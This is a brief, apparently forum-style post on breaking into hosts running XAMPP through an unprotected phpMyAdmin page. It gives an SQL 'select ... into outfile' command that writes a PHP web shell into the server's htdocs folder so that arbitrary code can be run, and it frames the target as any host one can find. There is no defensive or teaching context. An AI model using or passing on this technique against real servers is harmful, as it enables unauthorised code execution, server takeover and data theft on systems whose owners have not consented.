One of the vulns of xampp is that the phpmyadmin is unprotected. Therefor, if you can find a host running xampp you can most likely exploit it by entering i.p.a.d.r/phpmyadmin
From there you can do all forms of nasy stuff, for example:
Run in SQL;
select "<?php *WHATEVER PHPCODE YOU WANT TO RUN ?> into outfile "C:\xampp\htdocs\shell.php"
This enables you to run whatever php code you wish.
